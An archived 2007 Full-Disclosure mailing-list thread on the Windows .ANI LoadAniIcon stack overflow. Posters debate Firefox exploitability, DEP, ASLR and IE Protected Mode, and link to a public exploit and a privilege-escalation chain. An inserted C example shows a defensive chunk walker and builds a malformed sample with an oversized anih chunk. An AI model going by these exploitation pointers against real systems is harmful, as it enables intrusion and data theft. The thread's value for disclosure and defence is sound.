Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-10 Thread Knud Erik Højgaard
On 4/10/07, Brooks, Shane <[EMAIL PROTECTED]> wrote:
> Do you have a working exploit for this vuln?  The SecFocus page says none is 
> publicly available.

To contribute to this, the longest and most boring thread ever, look
at www.milw0rm.com (hi str0ke), specifically
http://www.milw0rm.com/exploits/3688 - 'The SecFocus page' hardly ever
updates that stuff (corporate whores) because they earn money by
"protecting" people.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-10 Thread Brooks, Shane
Do you have a working exploit for this vuln?  The SecFocus page says none is 
publicly available.

S

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Michal 
Majchrowicz
Sent: Tuesday, April 10, 2007 5:02 AM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

Hi.
One thing to add about IE protected mode and all that stuff:
We get shell (in ie protected mode) using ani vulnerability.
Go to the IE temporary directory. It must have write access there :)
Then we use this: http://www.securityfocus.com/bid/23278
And we have SYSTEM access :)
Regards.




Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-10 Thread Michal Majchrowicz
Hi.
One thing to add about IE protected mode and all that stuff:
We get shell (in ie protected mode) using ani vulnerability.
Go to the IE temporary directory. It must have write access there :)
Then we use this: http://www.securityfocus.com/bid/23278
And we have SYSTEM access :)
Regards.


On 4/8/07, wac <[EMAIL PROTECTED]> wrote:
> Hello:
>
> Firefox 2.0.0.3 (at least in windows) *seems to be vulnerable*. I don't
> remember exactly what it did but it behaved in a strange way I believe some
> file handle was left open and had to kill it the hard way. I don't know what
> they say in the docs but if it ends up calling the user32 function and
> that's all it takes to trigger the bug. I was taking a peek at its import
> tables and it imports from User32 the function LoadCursorA; maybe that could
> be the guilty one.
>
> anyway test here and see what happens (that link is from dev code)
>
> http://sicotik.com/ink/test.html
>
> I'm not vulnerable anymore since quite some time ;) and I don't have much
> time to test right now
>
> Regards
> Waldo
>


Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-08 Thread wac

Hello:

Firefox 2.0.0.3 (at least in windows) *seems to be vulnerable*. I don't
remember exactly what it did but it behaved in a strange way I believe some
file handle was left open and had to kill it the hard way. I don't know what
they say in the docs but if it ends up calling the user32 function and
that's all it takes to trigger the bug. I was taking a peek at its import
tables and it imports from User32 the function LoadCursorA; maybe that could
be the guilty one.

anyway test here and see what happens (that link is from dev code)

http://sicotik.com/ink/test.html

I'm not vulnerable anymore since quite some time ;) and I don't have much
time to test right now

Regards
Waldo

On 4/8/07, Michal Majchrowicz <[EMAIL PROTECTED]> wrote:


> Hi.
> There are more and more reports about FF and ani vulnerability.
> There was already a presentation of working exploit.
> The thing starts to annoy me and since I am far away from any windows
> I wanted to share some of my speculations.
> According to docs two things are obvious:
> 1) Firefox doesn't support ANI cursors
> 2) ANI is just a few cur cursors packed together and presented as an
> animation.
> So i have three possible ways of exploiting it:
> 1) Since ANI files are vulnerable then maybe cur files are also
> vulnerable. Firefox does support CUR files.
> 2) If firefox doesn't support ANI files it only means it doesn't
> render them. It doesn't mean it will not accept them in any way:)
> 3) Maybe it is possible to rename foo.ani and rename it to foo.cur.
> Then FF will call win api with this cursor. Windows API will recognize
> this as ANI file and call vulnerable function .
> As I said before these are just speculation. I hope someone will be
> able to confirm or prove that some of them (or all) have no sense.
> Happy Easter to everyone.
> Regards Michal.


Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-08 Thread Michal Majchrowicz
Hi.
There are more and more reports about FF and ani vulnerability.
There was already a presentation of working exploit.
The thing starts to annoy me and since I am far away from any windows
I wanted to share some of my speculations.
According to docs two things are obvious:
1) Firefox doesn't support ANI cursors
2) ANI is just a few cur cursors packed together and presented as an animation.
So i have three possible ways of exploiting it:
1) Since ANI files are vulnerable then maybe cur files are also
vulnerable. Firefox does support CUR files.
2) If firefox doesn't support ANI files it only means it doesn't
render them. It doesn't mean it will not accept them in any way:)
3) Maybe it is possible to rename foo.ani and rename it to foo.cur.
Then FF will call win api with this cursor. Windows API will recognize
this as ANI file and call vulnerable function .
As I said before these are just speculation. I hope someone will be
able to confirm or prove that some of them (or all) have no sense.
Happy Easter to everyone.
Regards Michal.

On 4/4/07, Peter Ferrie <[EMAIL PROTECTED]> wrote:
> >That's correct, Firefox doesn't support ANI files for cursors.
>
> Right, and it doesn't need to, because cursors are not the only way to reach 
> the vulnerable code.
> Icons can do it, too.
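
The RIFF container Michal describes above ("a few cur cursors packed together"), walked defensively. This is an added example for this thread, not code from any of the posters, from Mozilla or from Microsoft. It assumes the public layout of an .ani file (RIFF form type "ACON", an "anih" chunk holding the 36-byte ANIHEADER, frames inside a LIST chunk) and the published root cause of MS07-017: LoadAniIcon copied anih chunk data into a fixed 36-byte stack structure using the length declared in the chunk header, so a later, oversized anih chunk overflowed the stack. The walker rejects any anih chunk whose declared length is not 36, bounds every declared size against the buffer before using it, and keys on the RIFF/ACON signature rather than the file extension, which is the property Michal's third speculation depends on. build_sample_ani is a hypothetical helper that constructs the sample files in memory; nothing here is taken from an exploit.

```c
/* Added example, not from the thread: defensive walker for the RIFF "ACON"
 * container used by Windows animated cursors.  Assumed format facts: form
 * type "ACON"; an "anih" chunk carrying the 36-byte ANIHEADER (9 DWORDs);
 * frames inside a LIST chunk.  Sample inputs are constructed in memory. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ANIH_EXPECTED_SIZE 36u    /* sizeof(ANIHEADER): 9 DWORDs */

enum ani_verdict {
    ANI_NOT_ACON = 0,   /* no RIFF/ACON signature: not an animated cursor */
    ANI_OK = 1,         /* every anih chunk is exactly 36 bytes */
    ANI_BAD_ANIH = 2,   /* an anih chunk declares a size other than 36 */
    ANI_TRUNCATED = 3   /* a chunk's declared size runs past the data */
};

static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

static void put32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* Walk the chunks in [p, end), descending into LIST chunks so a nested anih
 * is still inspected.  Declared sizes are bounded before use, which is the
 * check the vulnerable copy in LoadAniIcon lacked. */
static enum ani_verdict walk(const uint8_t *p, const uint8_t *end) {
    while (end - p >= 8) {
        uint32_t size = rd32(p + 4);
        const uint8_t *data = p + 8;
        if (size > (uint32_t)(end - data))
            return ANI_TRUNCATED;
        if (memcmp(p, "anih", 4) == 0 && size != ANIH_EXPECTED_SIZE)
            return ANI_BAD_ANIH;
        if (memcmp(p, "LIST", 4) == 0 && size >= 4) {
            enum ani_verdict v = walk(data + 4, data + size); /* skip list type */
            if (v != ANI_OK)
                return v;
        }
        size_t adv = (size_t)size + (size & 1u);  /* chunks are word-aligned */
        if (adv > (size_t)(end - data))
            break;                                /* missing pad byte at EOF */
        p = data + adv;
    }
    return ANI_OK;
}

/* Content, not extension, decides: only the RIFF/ACON signature is consulted. */
enum ani_verdict check_ani(const uint8_t *buf, size_t len) {
    if (len < 12 || memcmp(buf, "RIFF", 4) != 0 || memcmp(buf + 8, "ACON", 4) != 0)
        return ANI_NOT_ACON;
    size_t riff_size = rd32(buf + 4);
    if (riff_size > len - 8)
        riff_size = len - 8;          /* never trust the header past the data */
    return walk(buf + 12, buf + 8 + riff_size);
}

/* Write one chunk (id, LE size, data, pad byte if odd); NULL data = zeros. */
static size_t put_chunk(uint8_t *out, const char *id, const uint8_t *data, uint32_t size) {
    memcpy(out, id, 4);
    put32(out + 4, size);
    if (data) memcpy(out + 8, data, size); else memset(out + 8, 0, size);
    size_t n = 8 + size;
    if (size & 1u) out[n++] = 0;
    return n;
}

/* Hypothetical helper: constructed minimal .ani image in `out` (caller gives
 * at least 128 + second_anih_size bytes).  second_anih_size == 0 yields a
 * well-formed file; otherwise a second anih chunk of that size is appended,
 * the shape the LoadAniIcon bug was hit with. */
size_t build_sample_ani(uint8_t *out, uint32_t second_anih_size) {
    uint8_t anih[ANIH_EXPECTED_SIZE] = {0};
    put32(anih + 0, ANIH_EXPECTED_SIZE);   /* cbSize  */
    put32(anih + 4, 1);                    /* cFrames */
    put32(anih + 8, 1);                    /* cSteps  */
    uint8_t frame[8] = {0};                /* placeholder frame bytes, not a real .cur */
    uint8_t list[4 + 8 + sizeof frame];    /* "fram" + one "icon" chunk */
    memcpy(list, "fram", 4);
    put_chunk(list + 4, "icon", frame, sizeof frame);

    memcpy(out, "RIFF", 4);
    memcpy(out + 8, "ACON", 4);
    size_t n = 12;
    n += put_chunk(out + n, "anih", anih, sizeof anih);
    n += put_chunk(out + n, "LIST", list, sizeof list);
    if (second_anih_size)
        n += put_chunk(out + n, "anih", NULL, second_anih_size);
    put32(out + 4, (uint32_t)(n - 8));     /* RIFF size excludes "RIFF" + size */
    return n;
}

int main(void) {
    uint8_t buf[512];
    size_t n = build_sample_ani(buf, 0);
    printf("well-formed sample:          verdict %d\n", check_ani(buf, n));
    n = build_sample_ani(buf, 100);
    printf("oversized second anih (100): verdict %d\n", check_ani(buf, n));
    return 0;
}
```

The walker reports the first problem it meets and stops, so on a malformed file the verdict tells you which invariant broke; a gateway that scans cursor and icon downloads would treat anything other than ANI_OK (or ANI_NOT_ACON for a genuine .cur) as reject.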


Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-04 Thread Peter Ferrie
>That's correct, Firefox doesn't support ANI files for cursors.
 
Right, and it doesn't need to, because cursors are not the only way to reach 
the vulnerable code.
Icons can do it, too.
 



Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-03 Thread Daniel Veditz
George Ou wrote:
> The patch for ANI is out from Microsoft.  I'm assuming the question is if we
> will see this technique for Firefox exploitation posted now?

Why? That would needlessly put Firefox users at risk -- not everyone will
be able to apply the Windows patch immediately. Microsoft may have had
since December to craft a patch, but the Firefox team hasn't.



Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-03 Thread Alexander Sotirov
Larry Seltzer wrote:
>>> Larry, why are you so curious about how this exploit works? 
> 
> Because the Firefox docs say they don't support ANI files for cursors
> and I can't get any non-malicious ones to work in it. I have to admit
> I'm having trouble getting them to work in IE now too.

That's correct, Firefox doesn't support ANI files for cursors. If the
exploitation method was so obvious, we would already have Firefox exploits in
the wild, wouldn't we?

> What's wrong with this code?
>
> BODY{cursor: url(http://www.larryseltzer.com/DRUM.ANI);}

Maybe the url should be in quotes? This works for me:


Alex



Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-03 Thread Larry Seltzer
>>Firefox doesn't support ANI files for cursors. If the exploitation
method was so obvious, we would already have Firefox exploits in the
wild, wouldn't we? 

I don't know. I'll have to think about how else you would get it to use
an ANI. There's no Flash involved, is there?

>>Maybe the url should be in quotes? This works for me:
>>
It's actually supposed to work with or without quotes I think and I've
tried a dozen variants and yours here. No luck. The cursors are straight
out of c:\windows\cursors. I'll try it in the morning.

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry%5Fseltzer/
Contributing Editor, PC Magazine
[EMAIL PROTECTED] 



Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-03 Thread Larry Seltzer
>>Larry, why are you so curious about how this exploit works? 

Because the Firefox docs say they don't support ANI files for cursors
and I can't get any non-malicious ones to work in it. I have to admit
I'm having trouble getting them to work in IE now too.

What's wrong with this code?

<html>
<head>
<style type="text/css">
BODY{cursor: url(http://www.larryseltzer.com/DRUM.ANI);}
</style>
</head>
<body>
<p>This is a harmless animated cursor.</p>
<p>This is a harmless animated cursor.</p>
<p>This is a harmless animated cursor.</p>
<p>This is a harmless animated cursor.</p>
</body>
</html>

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry%5Fseltzer/
Contributing Editor, PC Magazine
[EMAIL PROTECTED] 



Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-03 Thread Alexander Sotirov
Larry Seltzer wrote:
> Alex had said that he was exploiting this bug on Firefox, even though
> the Firefox docs say it should be impossible. I'm just trying to
> understand how his claims are possible.
> 
> There's no reason to believe the Firefox developers need to do anything.
> IE, for example, is fixed when the ANI code in GDI is fixed. 

To avoid any confusion:

1) There is no vulnerability in the Firefox source code

2) Firefox uses a Windows API function which uses the vulnerable code in
USER32.DLL, so the ANI vulnerability can be exploited through Firefox

3) Installing the MS07-017 patch will protect both IE and Firefox against this
vulnerability

4) There is no vulnerability for the Firefox developers to patch. I recommend
that they limit their use of the Windows API to avoid being affected by the next
Windows vuln, but this is application hardening, not a vulnerability fix.

5) Even though the patch is already out, I'd like to avoid harming Windows
users who haven't installed it, so that's why I'm not releasing the details
about the Firefox exploit just yet.


Larry, why are you so curious about how this exploit works?


Alex



Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-03 Thread Larry Seltzer
Alex had said that he was exploiting this bug on Firefox, even though
the Firefox docs say it should be impossible. I'm just trying to
understand how his claims are possible.

There's no reason to believe the Firefox developers need to do anything.
IE, for example, is fixed when the ANI code in GDI is fixed. 

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry%5Fseltzer/
Contributing Editor, PC Magazine
[EMAIL PROTECTED] 

-Original Message-
From: Daniel Veditz [mailto:[EMAIL PROTECTED] 
Sent: Tuesday, April 03, 2007 9:47 PM
To: George Ou
Cc: Larry Seltzer; 'Alexander Sotirov';
full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

George Ou wrote:
> The patch for ANI is out from Microsoft.  I'm assuming the question is

> if we will see this technique for Firefox exploitation posted now?

Why? That would needlessly put Firefox users at risk -- not everyone
will be able to apply the Windows patch immediately. Microsoft may have
had since December to craft a patch, but the Firefox team hasn't.



Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-03 Thread [EMAIL PROTECTED]
Affected Software:

Microsoft Windows 2000 Service Pack 4
Microsoft Windows XP Service Pack 2
Microsoft Windows XP Professional x64 Edition and Microsoft Windows XP 
Professional x64 Edition Service Pack 2
Microsoft Windows Server 2003, Microsoft Windows Server 2003 Service 
Pack 1, and Microsoft Windows Server 2003 Service Pack 2
Microsoft Windows Server 2003 for Itanium-based Systems, Microsoft 
Windows Server 2003 with SP1 for Itanium-based Systems, and Microsoft 
Windows Server 2003 with SP2 for Itanium-based Systems
Microsoft Windows Server 2003 x64 Edition and Microsoft Windows Server 
2003 x64 Edition Service Pack 2
Windows Vista
Windows Vista x64 Edition

All patches are out except for XP SP1, and no warning that I'm seriously at
risk if I'm not urgently upgrading to SP2. No way! I'll keep my cheese =)


George Ou wrote:
> The patch for ANI is out from Microsoft.  I'm assuming the question is if we
> will see this technique for Firefox exploitation posted now?


Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-03 Thread George Ou
The patch for ANI is out from Microsoft.  I'm assuming the question is if we
will see this technique for Firefox exploitation posted now?

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Larry
Seltzer
Sent: Tuesday, April 03, 2007 2:14 PM
To: Alexander Sotirov
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

LS> The Firefox docs say that it doesn't support .ani files for cursors.

LS> How are you exploiting it?
AS> I'll wait until the patch is out before I publish the technique. 
AS> As far as I know there are no public ANI exploits for Firefox yet. 

So now can you say how Firefox is vulnerable?

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry%5Fseltzer/
Contributing Editor, PC Magazine
[EMAIL PROTECTED] 



Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-03 Thread Larry Seltzer
LS> The Firefox docs say that it doesn't support .ani files for cursors.

LS> How are you exploiting it?
AS> I'll wait until the patch is out before I publish the technique. 
AS> As far as I know there are no public ANI exploits for Firefox yet. 

So now can you say how Firefox is vulnerable?

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry%5Fseltzer/
Contributing Editor, PC Magazine
[EMAIL PROTECTED] 



Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-02 Thread Alexander Sotirov
Larry Seltzer wrote:
>>> I just posted a video of exploiting IE7 and Firefox on Vista.  
> 
> The Firefox docs say that it doesn't support .ani files for cursors. How
> are you exploiting it?

I'll wait until the patch is out before I publish the technique. As far as I
know there are no public ANI exploits for Firefox yet.

Alex



Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-02 Thread Larry Seltzer
Specifically
http://developer.mozilla.org/en/docs/Using_URL_values_for_the_cursor_property
in the "Limitations" section

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry%5Fseltzer/
Contributing Editor, PC Magazine
[EMAIL PROTECTED] 



Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-02 Thread Larry Seltzer
>>I just posted a video of exploiting IE7 and Firefox on Vista.  

The Firefox docs say that it doesn't support .ani files for cursors. How
are you exploiting it?

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry%5Fseltzer/
Contributing Editor, PC Magazine
[EMAIL PROTECTED] 



Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-02 Thread George Ou
Ok thanks.  I guess we need to add "steal data" to the list of things an
exploited IE7 session in Vista can do.  I never got to test that far because
DEP nuked my browser session.


George

-Original Message-
From: Alexander Sotirov [mailto:[EMAIL PROTECTED] 
Sent: Monday, April 02, 2007 7:14 PM
To: George Ou
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

George Ou wrote:
> The exploited instance of IE7 probably spawns cmd.exe with the same
> privilege levels as IE7 in Protected Mode, which means you don't have
> read/write access to the user or system files.  It's still bad because you
> probably get to harvest all of the saved username/passwords in the browser
> and capture all input/output from that IE session.
> 
> Now in the case of an exploited Firefox 2, you have full read/write
> permissions to all of the user files which means you get to steal all the
> user files and/or encrypt them for ransom.

Protected Mode only blocks write access. IE can write only to a few
locations on the system, but it still has full read access to all files
readable by the user.

See http://msdn.microsoft.com/library/en-us/IETechCol/dnwebgen/ProtectedMode.asp
and slides 41-53 in
http://download.microsoft.com/download/0/1/3/01381C25-72DA-4AA9-B792-43E02A243C71/SEC403_Riley.ppt

Alex



Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-02 Thread Alexander Sotirov
George Ou wrote:
> The exploited instance of IE7 probably spawns cmd.exe with the same
> privilege levels as IE7 in Protected Mode, which means you don't have
> read/write access to the user or system files.  It's still bad because you
> probably get to harvest all of the saved username/passwords in the browser
> and capture all input/output from that IE session.
> 
> Now in the case of an exploited Firefox 2, you have full read/write
> permissions to all of the user files which means you get to steal all the
> user files and/or encrypt them for ransom.

Protected Mode only blocks write access. IE can write only to a few locations on
the system, but it still has full read access to all files readable by the user.

See http://msdn.microsoft.com/library/en-us/IETechCol/dnwebgen/ProtectedMode.asp
and slides 41-53 in
http://download.microsoft.com/download/0/1/3/01381C25-72DA-4AA9-B792-43E02A243C71/SEC403_Riley.ppt

Alex



Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-02 Thread George Ou
The exploited instance of IE7 probably spawns cmd.exe with the same
privilege levels as IE7 in Protected Mode, which means you don't have
read/write access to the user or system files.  It's still bad because you
probably get to harvest all of the saved username/passwords in the browser
and capture all input/output from that IE session.

Now in the case of an exploited Firefox 2, you have full read/write
permissions to all of the user files which means you get to steal all the
user files and/or encrypt them for ransom.


George

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Alexander
Sotirov
Sent: Monday, April 02, 2007 6:19 PM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

Larry Seltzer wrote:
> I'm beginning to think that web-based attacks with this in Vista aren't
> really so scary. Even if you can get them to execute what can you really
> do in IE protected mode?

I just posted a video of exploiting IE7 and Firefox on Vista. Internet Explorer
was running in protected mode with DEP disabled (this is the default Vista
setup). It's interesting that the protected mode of IE does not stop the
execution of cmd.exe, but it does prevent you from writing to the file system
once you get the shell.

http://determina.blogspot.com/

Alexander Sotirov
Determina Security Research



Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-02 Thread Alexander Sotirov
Larry Seltzer wrote:
> I'm beginning to think that web-based attacks with this in Vista aren't
> really so scary. Even if you can get them to execute what can you really
> do in IE protected mode?

I just posted a video of exploiting IE7 and Firefox on Vista. Internet Explorer
was running in protected mode with DEP disabled (this is the default Vista
setup). It's interesting that the protected mode of IE does not stop the
execution of cmd.exe, but it does prevent you from writing to the file system
once you get the shell.

http://determina.blogspot.com/

Alexander Sotirov
Determina Security Research



Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-02 Thread KJKHyperion
James Matthews wrote:
> The issue is that this only works with DEP turned off!

HOLY SHIT an insightful comment by James Matthews!!! Haha, almost got me 
there, nice April fools!



Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-02 Thread Kristian Hermansen
Dave Aitel <[EMAIL PROTECTED]> wrote:
> ASLR has limited entropy and the attacker can continue to try exploits
> an infinite number of times (as Solar Eclipse points out). This means
> you can write a reliable Vista exploit, theoretically. I'll probably
> finish one up on Monday.

On 32-bit, yes, but 64-bit ASLR entropy means it is not very likely to
hit your offset :-)  Has anyone even attempted a 64-bit XP/Vista ANI
exploit?
-- 
Kristian Hermansen



Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-02 Thread George Ou
" You reference the correct page but then completely miss the point, please
read the page entirely. Your pasted information related to software DEP not
Hardware enforced DEP (which is NX bit)

Quote (wiki) :
If the x86 processor supports this feature in hardware, then the NX features
are turned on automatically in Windows XP/Server 2003 by default. If the
feature is not supported by the x86 processor, then no protection is given."

Thierry,

That wiki quote is very vague.  I'm telling you for a fact that DEP is
mostly turned off in Windows XP and Vista by default.  It's only turned on
for a few "essential windows programs and services" and that excludes things
like Internet Explorer which is unfortunate since hardware-enforced DEP has
blocked nearly all of the generic zero-day exploits in Internet Explorer.
This is why I have always recommended that people fully enable DEP
protection and use hardware that supports NX/XD.



George


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Thierry
Zoller
Sent: Monday, April 02, 2007 8:07 AM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

Dear Larry,

You are a stubborn guy, aren't you? _Again_, I am not talking Software DEP
but Hardware-enforced DEP. Read: 2 different things.

This is my last email in this regard, I see no point in trying to
give you further information that might help you estimate risk, as you
seem resistant to help or pointers beyond your comprehension or
current belief.

You reference the correct page but then completely miss the point,
please read the page entirely. Your pasted information related to
software DEP not Hardware enforced DEP (which is NX bit)

Quote (wiki) :
If the x86 processor supports this feature in hardware, then the NX features
are turned on automatically in Windows XP/Server 2003 by default. If the
feature is not supported by the x86 processor, then no protection is given.

"Software DEP" is unrelated to the NX bit, and is what Microsoft calls
their enforcement of Safe Structured Exception Handling. Software
DEP/SafeSEH
simply checks when an exception is thrown to make sure that the exception is
registered in a function table for the application, and requires the program
to be built with it. This is likely a countermeasure to handle an exploit
possible because of the way DEP handles NX faults; while most other
technologies simply terminate the program unquestioningly, DEP raises
an exception. It is not possible for a program to truly recover from
an attack because program flow is destroyed in an unrecoverable manner.


On the very same MS page you reference:

Hardware-enforced DEP
Hardware-enforced DEP marks all memory locations in a process as
non-executable unless the location explicitly contains executable code.
A class of attacks exists that tries to insert and run code from
non-executable memory locations. DEP helps prevent these attacks by
intercepting them and raising an exception.

Hardware-enforced DEP relies on processor hardware to mark memory with an
attribute that indicates that code should not be executed
from that memory. DEP functions on a per-virtual memory page basis, and DEP
typically changes a bit in the page table entry (PTE)
to mark the memory page.

Processor architecture determines how DEP is implemented in hardware and how
DEP marks the virtual memory page. However,
processors that support hardware-enforced DEP can raise an exception when
code is executed from a page that is marked with
the appropriate attribute set.

Advanced Micro Devices (AMD) and Intel have defined and shipped
Windows-compatible architectures that are compatible with DEP.

Beginning with Windows XP SP2, the 32-bit version of Windows uses one of the
following:
•   The no-execute page-protection (NX) processor feature as defined by
AMD.
•   The Execute Disable Bit (XD) feature as defined by Intel.


List of CPUs with NX bit (courtesy of Wikipedia)
* AMD Athlon 64
* AMD Athlon 64 X2
* AMD Athlon 64 FX
* AMD Opteron
* AMD Sempron (from Paris on)
* AMD Turion 64
* AMD Turion 64 X2
* Intel Celeron D
* Intel Celeron M (from the Dothan core on)
* Intel Core Duo
* Intel Core Solo
* Intel Core 2 Duo
* Intel Core 2 Extreme
* Intel Pentium 4 (from Prescott F/J type on)
* Intel Pentium D
* Intel Pentium Extreme Edition
* Intel Pentium M (from Dothan on, newer models)
* Transmeta Efficeon
* VIA C7

That said, Michal Majchrowicz pointed out return-to-libc style still
works with DEP enabled, yes, but what about ASLR activated in Vista?

Anyways, George already tested it, can somebody else confirm whether
this is an issue or non-issue on Vista with NX capable CPUs?


-- 
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 5D84 BFDC CD36 A951 2C45  2E57 28B3 75DD 0AC6 F1C7


Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-02 Thread George Ou
Larry is right here.  DEP is pretty much turned off by default for
everything except some critical system processes.  All your applications
including IE have it turned off by default.  You have to manually turn DEP
on for all programs and then make some manual exceptions for the few
applications (like Microsoft Live Meeting) that aren't compatible with DEP.
Vista isn't much better with DEP settings though I've noticed they've made
it much harder to make DEP exception entries because you now need to do it
manually instead of being prompted to insert a quick exception on the fly.


George

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Larry
Seltzer
Sent: Monday, April 02, 2007 7:53 AM
To: Thierry Zoller
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

>>That's where you are wrong larry, if you have an NX capable CPU
("hardware enforced") DEP is turned on by default on all and every
process. Software DEP is not really DEP it's more like SafeSEH... 

See http://support.microsoft.com/default.aspx/kb/875352 ("A detailed
description of the Data Execution Prevention (DEP) feature in Windows XP
Service Pack 2...")

"OptIn - This setting is the default configuration. On systems with
processors that can implement hardware-enforced DEP, DEP is enabled by
default for limited system binaries and programs that "opt-in." With
this option, only Windows system binaries are covered by DEP by default.
"

I'm almost positive that the limited system binaries do not include
Internet Explorer. At the time they made this configuration decision too
many controls were broken by turning on DEP by default. 

And the policy is the same in Vista. For now.

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry%5Fseltzer/
Contributing Editor, PC Magazine
[EMAIL PROTECTED] 



Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-02 Thread Morning Wood
> Fuck you too.
> 
> Larry Seltzer
> eWEEK.com Security Center Editor

cool, Ziff-Davis lets you curse online.



Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-02 Thread Michele Cicciotti
> Try the current milw0rm PoCs on NX-enforced CPUs

Newsflash: none of the milw0rm PoCs ever worked on hardware DEP. We never told 
you because you seemed to have _so_ much fun tossing your cute little payloads 
around. In the happier days when I worked as an early warning dude, I used to 
keep an "IEXPLORE-NONX.EXE" with a hacked binary header (re: KJKHyperion's post 
about Torpark) that triggers the automatic disabling of DEP, to test PoCs with



Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-02 Thread Dave Aitel
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

ASLR has limited entropy and the attacker can continue to try exploits
an infinite number of times (as Solar Eclipse points out). This means
you can write a reliable Vista exploit, theoretically. I'll probably
finish one up on Monday.

IE in protected mode would still allow you access to the local network
and, more importantly, anything IE does. You could, for example,
inject code into all viewed webpages that steals passwords and
whatnot. Just at the very minimum.

- -dave




Larry Seltzer wrote:
>>> It is completely possible to execute shellcode if we can do some DEP
> bypass (ie. ret2libc attack, etc..) 
>
> In Vista this should have problems because of ASLR, right?
>
> I'm beginning to think that web-based attacks with this in Vista aren't
> really so scary. Even if you can get them to execute what can you really
> do in IE protected mode? You need to get the user to run the ANI outside
> of IE. Can anyone say what actually happens if you read an e-mail in the
> Vista Mail program with an attack ANI embedded?
>
> Larry Seltzer
> eWEEK.com Security Center Editor
> http://security.eweek.com/
> http://blog.eweek.com/blogs/larry%5Fseltzer/
> Contributing Editor, PC Magazine
> [EMAIL PROTECTED]
>

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFGEAsYtehAhL0gheoRAutoAJ0QhPsOvcdCTU2dZZgkZYINC3+K3QCdFMQH
UH02qnLi2Gbp07rLWpKv/5w=
=4oC5
-END PGP SIGNATURE-



Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

2007-04-02 Thread Thierry Zoller
Dear Michal,

